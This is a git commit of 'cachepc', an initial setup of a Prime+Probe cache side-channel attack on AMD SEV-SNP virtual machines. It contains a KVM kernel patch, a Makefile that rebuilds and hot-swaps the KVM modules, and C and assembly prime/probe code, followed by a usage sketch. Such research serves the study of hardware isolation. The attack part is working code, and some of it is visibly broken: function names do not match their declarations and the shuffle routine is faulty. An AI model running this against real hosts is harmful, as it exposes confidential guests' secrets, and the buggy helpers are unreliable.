cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc

commit cee2126b8f316677ebee57e19fe7d50d09c066d1
Author: Louis Burda <quent.burda@gmail.com>
Date:   Mon,  4 Jul 2022 16:26:35 +0200

Initial out-of-tree setup

Diffstat:
A .gitignore        |   3 +++
A Makefile          |  25 +++++++++++++++++++++++++
A patch.diff        |  59 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/asm.h         |  72 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/cache_types.h |  66 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/cachepc.c     | 221 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/cachepc.h     | 135 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A src/device_conf.h |  29 +++++++++++++++++++++++++++++
A src/util.c        |  40 ++++++++++++++++++++++++++++++++++++++++
A src/util.h        |   9 +++++++++
10 files changed, 659 insertions(+), 0 deletions(-)

diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,3 @@
+build.sh
+*.o.cmd
+*.o
diff --git a/Makefile b/Makefile
@@ -0,0 +1,25 @@
+KERNEL_SOURCE ?= /usr/src/linux
+PWD := $(shell pwd)
+
+.PHONY: all reset prepare build
+
+all: reset prepare build
+
+reset:
+	git -C $(KERNEL_SOURCE) reset --hard
+	$(MAKE) -C $(KERNEL_SOURCE) SUBDIRS=arch/x86/kvm clean
+
+prepare:
+	git -C $(KERNEL_SOURCE) apply $(PWD)/patch.diff
+
+$(KERNEL_SOURCE)/arch/x86/kvm/svm/cachepc:
+	ln -s $(PWD)/src $@
+
+build: $(KERNEL_SOURCE)/arch/x86/kvm/svm/cachepc
+	$(MAKE) -C $(KERNEL_SOURCE) arch/x86/kvm/kvm.ko arch/x86/kvm/kvm-amd.ko
+
+load:
+	sudo rmmod kvm_amd || true
+	sudo rmmod kvm || true
+	sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm.ko
+	sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm-amd.ko
diff --git a/patch.diff b/patch.diff
@@ -0,0 +1,59 @@
+diff --git a/arch/x86/kvm/Makefile b/arch/x86/kvm/Makefile
+index b804444e16d4..1f7d3b15cf4a 100644
+--- a/arch/x86/kvm/Makefile
++++ b/arch/x86/kvm/Makefile
+@@ -20,7 +20,8 @@ kvm-y += x86.o emulate.o i8259.o irq.o lapic.o \
+ 
+ kvm-intel-y += vmx/vmx.o vmx/vmenter.o vmx/pmu_intel.o vmx/vmcs12.o \
+ 			vmx/evmcs.o vmx/nested.o vmx/posted_intr.o
+-kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o
++kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o \
++	svm/cachepc/cachepc.o svm/cachepc/util.o
+ 
+ obj-$(CONFIG_KVM) += kvm.o
+ obj-$(CONFIG_KVM_INTEL) += kvm-intel.o
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 7b3cfbe8f7e3..cd5cb4320a17 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -2,6 +2,8 @@
+ 
+ #include <linux/kvm_host.h>
+ 
++#include "cachepc/cachepc.h"
++
+ #include "irq.h"
+ #include "mmu.h"
+ #include "kvm_cache_regs.h"
+@@ -3728,6 +3730,16 @@ void __svm_vcpu_run(unsigned long vmcb_pa, unsigned long *regs);
+ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+ 					struct vcpu_svm *svm)
+ {
++	static struct cache_ctx *ctx = NULL;
++	static struct cacheline *cache_ds = NULL;
++	static struct cacheline *curr_head = NULL;
++	static struct cacheline *next_head = NULL;
++	static int run_index = 0;
++
++	if (!ctx) ctx = cachepc_get_ctx(L1);
++	if (!cache_ds) cache_ds = cachepc_prepare_ds(ctx);
++	if (!curr_head) curr_head = cache_ds;
++
+ 	/*
+ 	 * VMENTER enables interrupts (host state), but the kernel state is
+ 	 * interrupts disabled when this is invoked. Also tell RCU about
+@@ -3751,7 +3763,13 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+ 	if (sev_es_guest(svm->vcpu.kvm)) {
+ 		__svm_sev_es_vcpu_run(svm->vmcb_pa);
+ 	} else {
+-		__svm_vcpu_run(svm->vmcb_pa, (unsigned long *)&svm->vcpu.arch.regs);
++		curr_head = cachepc_prime(curr_head);
++		__svm_vcpu_run(svm->vmcb_pa, (unsigned long *)&svm->vcpu.arch.regs);
++		next_head = cachepc_probe(curr_head);
++		//cachepc_save_msrmt(curr_head, "/tmp/msrmt", run_index);
++		cachepc_print_msrmt(curr_head);
++		curr_head = next_head;
++		run_index += 1;
+ 
+ #ifdef CONFIG_X86_64
+ 		native_wrmsrl(MSR_GS_BASE, svm->host.gs_base);
diff --git a/src/asm.h b/src/asm.h
@@ -0,0 +1,72 @@
+#pragma once
+
+#include <linux/kernel.h>
+
+#define CPUID_AFFECTED_REGS "rax", "rbx", "rcx", "rdx"
+
+__attribute__((always_inline))
+static inline uint64_t cachepc_readpmc(uint64_t event);
+
+__attribute__((always_inline))
+static inline void cachepc_cpuid(void);
+
+__attribute__((always_inline))
+static inline void cachepc_lfence(void);
+
+__attribute__((always_inline))
+static inline void cachepc_sfence(void);
+
+__attribute__((always_inline))
+static inline void cachepc_mfence(void);
+
+uint64_t
+cachepc_readpmc(uint64_t event)
+{
+	uint32_t lo, hi;
+
+	asm volatile (
+		"mov %[event], %%rcx\t\n"
+		"rdpmc\t\n"
+		: "=a" (lo), "=d" (hi)
+		: [event] "r" (event)
+	);
+
+	return ((uint64_t) hi << 32) | lo;
+}
+
+void
+cachepc_cpuid(void)
+{
+	asm volatile(
+		"mov $0x80000005, %%eax\n\t"
+		"cpuid\n\t"
+		::: CPUID_AFFECTED_REGS
+	);
+}
+
+void
+cachepc_lfence(void)
+{
+	asm volatile(
+		"lfence\n\t"
+		::
+	);
+}
+
+void
+cachepc_sfence(void)
+{
+	asm volatile(
+		"sfence\n\t"
+		::
+	);
+}
+
+void
+cachepc_mfence(void)
+{
+	asm volatile(
+		"mfence\n\t"
+		::
+	);
+}
diff --git a/src/cache_types.h b/src/cache_types.h
@@ -0,0 +1,66 @@
+#pragma once
+
+#include "device_conf.h"
+
+#include <linux/build_bug.h>
+
+#define SET_MASK(SETS) (((((uintptr_t) SETS) * CACHELINE_SIZE) - 1) ^ (CACHELINE_SIZE - 1))
+
+#define REMOVE_PAGE_OFFSET(ptr) ((void *) (((uintptr_t) ptr) & PAGE_MASK))
+
+#define GET_BIT(b, i) (((b & (1 << i)) >> i) & 1)
+#define SET_BIT(b, i) (b | (1 << i))
+
+/* Operate cacheline flags
+ * Used flags:
+ *  32                            2      1       0
+ * | | ... | cache group initialized | last | first |
+ */
+#define DEFAULT_FLAGS 0
+#define SET_FIRST(flags) SET_BIT(flags, 0)
+#define SET_LAST(flags) SET_BIT(flags, 1)
+#define SET_CACHE_GROUP_INIT(flags) SET_BIT(flags, 2)
+#define IS_FIRST(flags) GET_BIT(flags, 0)
+#define IS_LAST(flags) GET_BIT(flags, 1)
+#define IS_CACHE_GROUP_INIT(flags) GET_BIT(flags, 2)
+
+// Offset of the next and prev field in the cacheline struct
+#define CL_NEXT_OFFSET 0
+#define CL_PREV_OFFSET 8
+
+typedef enum cache_level cache_level;
+typedef enum addressing_type addressing_type;
+typedef struct cacheline cacheline;
+typedef struct cache_ctx cache_ctx;
+
+enum cache_level {L1, L2};
+enum addressing_type {VIRTUAL, PHYSICAL};
+
+struct cache_ctx {
+	cache_level cache_level;
+	addressing_type addressing;
+
+	uint32_t sets;
+	uint32_t associativity;
+	uint32_t access_time;
+	uint32_t nr_of_cachelines;
+	uint32_t set_size;
+	uint32_t cache_size;
+};
+
+struct cacheline {
+	// Doubly linked list inside same set
+	// Attention: CL_NEXT_OFFSET and CL_PREV_OFFSET
+	// must be kept up to date
+	cacheline *next;
+	cacheline *prev;
+
+	uint16_t cache_set;
+	uint16_t flags;
+
+	// Unused padding to fill cache line
+	uint64_t count;
+	char padding[32];
+};
+
+static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "Bad cache line struct size");
diff --git a/src/cachepc.c b/src/cachepc.c
@@ -0,0 +1,221 @@
+#include "cachepc.h"
+
+static cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cacheline_ptr_arr);
+static void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_ptr_arr);
+static cacheline **allocate_cache_ds(cache_ctx *ctx);
+static uint16_t get_virt_cache_set(cache_ctx *ctx, void *ptr);
+static void *aligned_alloc(size_t alignment, size_t size);
+
+cache_ctx *
+get_cache_ctx(cache_level cache_level)
+{
+	cache_ctx *ctx;
+
+	ctx = kzalloc(sizeof(cache_ctx), GFP_KERNEL);
+	BUG_ON(ctx == NULL);
+
+	if (cache_level == L1) {
+		ctx->addressing = L1_ADDRESSING;
+		ctx->sets = L1_SETS;
+		ctx->associativity = L1_ASSOCIATIVITY;
+		ctx->access_time = L1_ACCESS_TIME;
+	} else if (cache_level == L2) {
+		ctx->addressing = L2_ADDRESSING;
+		ctx->sets = L2_SETS;
+		ctx->associativity = L2_ASSOCIATIVITY;
+		ctx->access_time = L2_ACCESS_TIME;
+	} else {
+		return NULL;
+	}
+
+	ctx->cache_level = cache_level;
+	ctx->nr_of_cachelines = ctx->sets * ctx->associativity;
+	ctx->set_size = CACHELINE_SIZE * ctx->associativity;
+	ctx->cache_size = ctx->sets * ctx->set_size;
+
+	return ctx;
+}
+
+/*
+ * Initialises the complete cache data structure for the given context
+ */
+cacheline *
+cachepc_prepare_ds(cache_ctx *ctx)
+{
+	cacheline **cacheline_ptr_arr;
+	cacheline *cache_ds;
+
+	cacheline_ptr_arr = allocate_cache_ds(ctx);
+	cache_ds = build_cache_ds(ctx, cacheline_ptr_arr);
+	kfree(cacheline_ptr_arr);
+
+	return cache_ds;
+}
+
+void
+cachepc_save_msrmt(cacheline *head, const char *prefix, int index)
+{
+	char filename[256];
+
+	snprintf(filename, sizeof(filename), "%s.%i", prefix, index);
+
+}
+
+void
+cache_print_msrmts(cacheline *head)
+{
+	cacheline *curr_cl;
+
+	curr_cl = head;
+	do {
+		if (IS_FIRST(curr_cl->flags)) {
+			printk(KERN_WARNING "Count for cache set %i: %llu\n",
+				curr_cl->cache_set, curr_cl->count);
+		}
+
+		curr_cl = curr_cl->prev;
+	} while (curr_cl != head);
+}
+
+/*
+ * Create a randomized doubly linked list with the following structure:
+ * set A <--> set B <--> ... <--> set X <--> set A
+ * where each set is one of the cache sets, in a random order.
+ * The sets are a doubly linked list of cachelines themselves:
+ * set A:
+ *  line[A + x0 * #sets] <--> line[A + x1 * #sets] <--> ...
+ * where x0, x1, ..., xD is a random permutation of 1, 2, ..., D
+ * and D = Associativity = | cache set |
+ */
+cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cl_ptr_arr) {
+	cacheline **cl_ptr_arr_sorted;
+	cacheline *curr_cl, *next_cl;
+	cacheline *cache_ds;
+	uint32_t *idx_per_set;
+	uint32_t idx_curr_set, set_offset;
+	uint32_t i, j, set, set_len;
+	uint32_t *idx_map;
+
+	idx_per_set = kzalloc(ctx->sets * sizeof(uint32_t), GFP_KERNEL);
+	BUG_ON(idx_per_set == NULL);
+
+	cl_ptr_arr_sorted = kmalloc(ctx->nr_of_cachelines * sizeof(cacheline *), GFP_KERNEL);
+	BUG_ON(cl_ptr_arr_sorted == NULL);
+
+	set_len = ctx->associativity;
+	for (i = 0; i < ctx->nr_of_cachelines; ++i) {
+		set_offset = cl_ptr_arr[i]->cache_set * set_len;
+		idx_curr_set = idx_per_set[cl_ptr_arr[i]->cache_set];
+
+		cl_ptr_arr_sorted[set_offset + idx_curr_set] = cl_ptr_arr[i];
+		idx_per_set[cl_ptr_arr[i]->cache_set] += 1;
+	}
+
+	// Build doubly linked list for every set
+	for (set = 0; set < ctx->sets; ++set) {
+		set_offset = set * set_len;
+		build_randomized_list_for_cache_set(ctx, cl_ptr_arr_sorted + set_offset);
+	}
+
+	// Relink the sets among each other
+	idx_map = kzalloc(ctx->sets * sizeof(uint32_t), GFP_KERNEL);
+	BUG_ON(idx_map == NULL);
+
+	gen_random_indices(idx_map, ctx->sets);
+
+	curr_cl = cl_ptr_arr_sorted[idx_map[0] * set_len]->prev;
+	for (j = 0; j < ctx->sets; ++j) {
+		curr_cl->next = cl_ptr_arr_sorted[idx_map[(j + 1) % ctx->sets] * set_len];
+		next_cl = curr_cl->next->prev;
+		curr_cl->next->prev = curr_cl;
+		curr_cl = next_cl;
+	}
+
+	cache_ds = cl_ptr_arr_sorted[idx_map[0] * set_len];
+
+	kfree(cl_ptr_arr_sorted);
+	kfree(idx_per_set);
+	kfree(idx_map);
+
+	return cache_ds;
+}
+
+/*
+ * Helper function to build a randomised list of cacheline structs for a set
+ */
+void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_ptr_arr)
+{
+	cacheline *curr_cl;
+	uint32_t len, *idx_map;
+	uint16_t i;
+
+	len = ctx->associativity;
+	idx_map = kzalloc(len * sizeof(uint32_t), GFP_KERNEL);
+	BUG_ON(idx_map == NULL);
+
+	gen_random_indices(idx_map, len);
+
+	for (i = 0; i < len; ++i) {
+		curr_cl = cacheline_ptr_arr[idx_map[i]];
+		curr_cl->next = cacheline_ptr_arr[idx_map[(i + 1) % len]];
+		curr_cl->prev = cacheline_ptr_arr[idx_map[(len - 1 + i) % len]];
+		curr_cl->count = 0;
+
+		if (curr_cl == cacheline_ptr_arr[0]) {
+			curr_cl->flags = SET_FIRST(DEFAULT_FLAGS);
+			curr_cl->prev->flags = SET_LAST(DEFAULT_FLAGS);
+		} else {
+			curr_cl->flags = curr_cl->flags | DEFAULT_FLAGS;
+		}
+	}
+
+	kfree(idx_map);
+}
+
+/*
+ * Allocate a data structure that fills the complete cache, i.e. consisting
+ * of `associativity` many cache lines for each cache set.
+ */
+cacheline **
+allocate_cache_ds(cache_ctx *ctx)
+{
+	cacheline **cl_ptr_arr, *cl_arr;
+	uint32_t i;
+
+	cl_ptr_arr = (cacheline **) kzalloc(ctx->nr_of_cachelines * sizeof(cacheline *), GFP_KERNEL);
+	BUG_ON(cl_ptr_arr == NULL);
+
+	BUG_ON(ctx->addressing != VIRTUAL);
+
+	// For virtual addressing, allocating a consecutive chunk of memory is enough
+	cl_arr = (cacheline *) aligned_alloc(PAGE_SIZE, ctx->cache_size);
+	BUG_ON(cl_arr == NULL);
+
+	for (i = 0; i < ctx->nr_of_cachelines; ++i) {
+		cl_ptr_arr[i] = cl_arr + i;
+		cl_ptr_arr[i]->cache_set = get_virt_cache_set(ctx, cl_ptr_arr[i]);
+	}
+
+	return cl_ptr_arr;
+}
+
+uint16_t
+get_virt_cache_set(cache_ctx *ctx, void *ptr)
+{
+	return (uint16_t) ((((uintptr_t) ptr) & SET_MASK(ctx->sets)) / CACHELINE_SIZE);
+}
+
+void *
+aligned_alloc(size_t alignment, size_t size)
+{
+	void *p;
+
+	if (size % alignment != 0)
+		size = size - (size % alignment) + alignment;
+	p = kmalloc(size, GFP_KERNEL);
+	BUG_ON(((uintptr_t) p) % alignment != 0);
+
+	return p;
+}
+
+
diff --git a/src/cachepc.h b/src/cachepc.h
@@ -0,0 +1,135 @@
+#pragma once
+
+#include <linux/kernel.h>
+#include <linux/types.h>
+#include <linux/slab.h>
+
+#include "asm.h"
+#include "cache_types.h"
+#include "util.h"
+
+cache_ctx *cachepc_get_ctx(cache_level cl);
+cacheline *cachepc_prepare_ds(cache_ctx *ctx);
+void cachepc_save_msrmt(cacheline *head, const char *prefix, int index);
+void cachepc_print_msrmt(cacheline *head);
+
+__attribute__((always_inline))
+static inline cacheline *cachepc_prime(cacheline *head);
+
+__attribute__((always_inline))
+static inline cacheline *cachepc_prime_rev(cacheline *head);
+
+__attribute__((always_inline))
+static inline cacheline *cachepc_probe_set(cacheline *curr_cl);
+
+__attribute__((always_inline))
+static inline cacheline *cachepc_probe(cacheline *head);
+
+/*
+ * Prime phase: fill the target cache (encoded in the size of the data structure)
+ * with the prepared data structure, i.e. with attacker data.
+ */
+static inline cacheline *
+cachepc_prime(cacheline *head)
+{
+	cacheline *curr_cl;
+
+	cachepc_cpuid();
+	curr_cl = head;
+	do {
+		curr_cl = curr_cl->next;
+		cachepc_mfence();
+	} while(curr_cl != head);
+	cachepc_cpuid();
+
+	return curr_cl->prev;
+}
+
+/*
+ * Same as prime, but in the reverse direction, i.e. the same direction that probe
+ * uses. This is beneficial for the following scenarios:
+ *   - L1:
+ *     - Trigger collision chain-reaction to amplify an evicted set (but this has
+ *       the downside of more noisy measurements).
+ *   - L2:
+ *     - Always use this for L2, otherwise the first cache sets will still reside
+ *       in L1 unless the victim filled L1 completely. In this case, an eviction
+ *       has randomly (depending on where the cache set is placed in the randomised
+ *       data structure) the following effect:
+ *       A) An evicted set is L2_ACCESS_TIME - L1_ACCESS_TIME slower
+ *       B) An evicted set is L3_ACCESS_TIME - L2_ACCESS_TIME slower
+ */
+static inline cacheline *
+cachepc_prime_rev(cacheline *head)
+{
+	cacheline *curr_cl;
+
+	cachepc_cpuid();
+	curr_cl = head;
+	do {
+		curr_cl = curr_cl->prev;
+		cachepc_mfence();
+	} while(curr_cl != head);
+	cachepc_cpuid();
+
+	return curr_cl->prev;
+}
+
+static inline cacheline *
+cachepc_probe_set(cacheline *curr_cl)
+{
+	uint64_t pre1, pre2, pre3;
+	uint64_t post1, post2, post3;
+	cacheline *next_cl;
+
+	pre1 = cachepc_readpmc(0);
+	pre2 = cachepc_readpmc(1);
+	pre3 = cachepc_readpmc(2);
+
+	cachepc_mfence();
+	asm volatile(
+		"mov 8(%[curr_cl]), %%rax \n\t"              // +8
+		"mov 8(%%rax), %%rcx \n\t"                   // +16
+		"mov 8(%%rcx), %%rax \n\t"                   // +24
+		"mov 8(%%rax), %%rcx \n\t"                   // +32
+		"mov 8(%%rcx), %%rax \n\t"                   // +40
+		"mov 8(%%rax), %%rcx \n\t"                   // +48
+		"mov 8(%%rcx), %[curr_cl_out] \n\t"          // +56
+		"mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64
+		: [next_cl_out] "=r" (next_cl),
+		  [curr_cl_out] "=r" (curr_cl)
+		: [curr_cl] "r" (curr_cl)
+		: "rax", "rcx"
+	);
+	cachepc_mfence();
+	cachepc_cpuid();
+
+	post1 = cachepc_readpmc(0);
+	cachepc_cpuid();
+	post2 = cachepc_readpmc(1);
+	cachepc_cpuid();
+	post3 = cachepc_readpmc(2);
+	cachepc_cpuid();
+
+	/* works across size boundary */
+	curr_cl->count = 0;
+	curr_cl->count += post1 - pre1;
+	curr_cl->count += post2 - pre2;
+	curr_cl->count += post3 - pre3;
+
+	return next_cl;
+}
+
+static inline cacheline *
+cachepc_probe(cacheline *head)
+{
+	cacheline *curr_cs;
+
+	curr_cs = head;
+	do {
+		curr_cs = cachepc_probe_set(curr_cs);
+	} while (__builtin_expect(curr_cs != head, 1));
+
+	return curr_cs->next;
+}
+
diff --git a/src/device_conf.h b/src/device_conf.h
@@ -0,0 +1,29 @@
+#pragma once
+
+// TODO: Read from kernel headers
+
+// General settings
+// #define PAGE_SIZE 4096
+#define PROCESSOR_FREQ 2900000000
+
+// Cache related settings
+#define CACHELINE_SIZE 64
+#define CACHE_GROUP_SIZE (PAGE_SIZE / CACHELINE_SIZE)
+
+// Addressing:
+//  - virtual: 0
+//  - physical: 1
+#define L1_ADDRESSING 0
+#define L1_SETS 64
+#define L1_ASSOCIATIVITY 8
+#define L1_ACCESS_TIME 4
+
+#define L2_ADDRESSING 1
+#define L2_SETS 512
+#define L2_ASSOCIATIVITY 8
+#define L2_ACCESS_TIME 12
+
+#define L3_ADDRESSING 1
+#define L3_SETS 4096
+#define L3_ASSOCIATIVITY 16
+#define L3_ACCESS_TIME 30
diff --git a/src/util.c b/src/util.c
@@ -0,0 +1,40 @@
+#include "util.h"
+
+#include <linux/random.h>
+
+void
+random_perm(uint32_t *arr, uint32_t arr_len)
+{
+	uint32_t i, idx, tmp;
+
+	for (i = arr_len - 1; i > 0; --i) {
+		get_random_bytes(&idx, 4);
+		idx = idx % i;
+
+		tmp = arr[idx];
+		arr[i] = arr[idx];
+		arr[idx] = tmp;
+	}
+}
+
+void
+gen_random_indices(uint32_t *arr, uint32_t arr_len)
+{
+	uint32_t i;
+
+	for (i = 0; i < arr_len; ++i)
+		arr[i] = i;
+	random_perm(arr, arr_len);
+}
+
+
+bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len) {
+	uint32_t i;
+
+	for (i = 0; i < arr_len; ++i) {
+		if (arr[i] == elem)
+			return true;
+	}
+
+	return false;
+}
diff --git a/src/util.h b/src/util.h
@@ -0,0 +1,9 @@
+#pragma once
+
+#include <linux/kernel.h>
+
+void gen_rand_bytes(unsigned char *arr, uint32_t arr_len);
+void random_perm(uint32_t *arr, uint32_t arr_len);
+void gen_random_indices(uint32_t *arr, uint32_t arr_len);
+
+bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len);
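
For orientation, the sketch below (not part of the commit) shows how the helpers declared in src/cachepc.h are meant to be combined around a victim computation, mirroring the hook that patch.diff adds to svm_vcpu_enter_exit(). The victim_action callback is hypothetical; in the patch the "victim" is the VMRUN performed by __svm_vcpu_run(). It also assumes the definitions in src/cachepc.c (get_cache_ctx, cache_print_msrmts) are renamed to match the header declarations (cachepc_get_ctx, cachepc_print_msrmt), which this initial commit does not yet do.

/* Hypothetical illustration of the prime/probe flow, not code from this commit. */
#include "cachepc.h"

static void
cachepc_measure_once(void (*victim_action)(void))
{
	static cache_ctx *ctx = NULL;
	static cacheline *cache_ds = NULL;
	static cacheline *curr_head = NULL;
	cacheline *next_head;

	if (!ctx)
		ctx = cachepc_get_ctx(L1);          /* L1 geometry taken from device_conf.h */
	if (!cache_ds)
		cache_ds = cachepc_prepare_ds(ctx); /* randomized linked list covering every set and way */
	if (!curr_head)
		curr_head = cache_ds;

	curr_head = cachepc_prime(curr_head);       /* fill every cache set with attacker-owned lines */
	victim_action();                            /* in patch.diff this is __svm_vcpu_run() */
	next_head = cachepc_probe(curr_head);       /* walk the lines again, accumulating PMC deltas per set */

	cachepc_print_msrmt(curr_head);             /* per-set counts are written to the kernel log */
	curr_head = next_head;                      /* reuse the structure for the next measurement */
}

Per the Makefile, running make resets the checkout at KERNEL_SOURCE, applies patch.diff, links src/ in as arch/x86/kvm/svm/cachepc and rebuilds kvm.ko and kvm-amd.ko; make load then swaps the rebuilt modules in via rmmod/insmod, after which every VMRUN of a non-SEV-ES guest is primed and probed as in the hook above.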